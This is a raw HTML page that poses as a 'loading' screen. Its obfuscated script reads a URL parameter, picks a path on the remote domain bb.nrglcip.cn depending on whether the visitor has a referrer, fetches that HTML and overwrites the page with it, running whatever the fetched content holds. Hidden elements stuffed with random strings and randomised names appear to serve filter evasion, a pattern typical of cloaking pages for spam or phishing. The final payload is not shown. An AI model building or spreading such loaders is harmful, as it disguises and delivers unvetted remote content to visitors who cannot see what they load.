<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Hq2GvYtzgz {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Hq2GvYtzgz .Oh1YYED8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Hq2GvYtzgz .content {
            line-height: 50px;
            text-align: center
        }

        .Hq2GvYtzgz .img {
            width: 100%
        }

        .Hq2GvYtzgz .hyLfLw {
            text-align: center
        }

        .Hq2GvYtzgz .hyLfLw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Hq2GvYtzgz .hyLfLw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Hq2GvYtzgz .hyLfLw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Hq2GvYtzgz .hyLfLw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Hq2GvYtzgz .hyLfLw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Hq2GvYtzgz .hyLfLw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Hq2GvYtzgz .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QkkYOf6KQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SXe5XSD = QkkYOf6KQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SXe5XSD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SXe5XSD +".html?a=share";
		}
		
        nbZqDxL=url+"#"+new Date().getTime();
        nbZqDxL && function() {
            $.get(nbZqDxL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>ehu8uQ9EBK2QAFigv1MagBRflXCTST8</a>
<h1 style='display:none' >kO6DKetb4m3ezCYuTPnF</h1>
<h1 style='display:none' >kO6DKetb4m3ezCYuTPnF</h1><div class="Hq2GvYtzgz">
    <div class="Oh1YYED8">
        <div class="hyLfLw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>dgllyFAGXcFh</a>
<a  href='#' style='display:none'>dgllyFAGXcFh</a>
<span style='display:none'>oyg1K98RB2Kh35ovuwwDN66ZNAzzdsHy0PccAarYSvQ5KoVGBck2360c32gm7vqxIJm</span>
<img  src='' style='display:none'>
<p  style='display:none'>QxRkixAd6xOHXWSkO2Y</p>
<b style='display:none' >o25am2E5t22lqNTm8tQ5Gs0I7m4n9KKNmbHs0TM7u5w5aI7HN5jMFUu052B58K4Gbo0i9ndCmbwqDjm3vh0PqjSZyT</b>
<h1 style='display:none' >Oc23HrxJJhuruG6n4Jvk57KkUjTcB1yWVZjC3cHWUV1SnHSeK3fxlgyWtoVtZ5OJ5PdsCw8FQdq3CfZWFbBrY37wq</h1>
<p  style='display:none'>QxRkixAd6xOHXWSkO2Y</p>
<h1 style='display:none' >Oc23HrxJJhuruG6n4Jvk57KkUjTcB1yWVZjC3cHWUV1SnHSeK3fxlgyWtoVtZ5OJ5PdsCw8FQdq3CfZWFbBrY37wq</h1></body>
</html>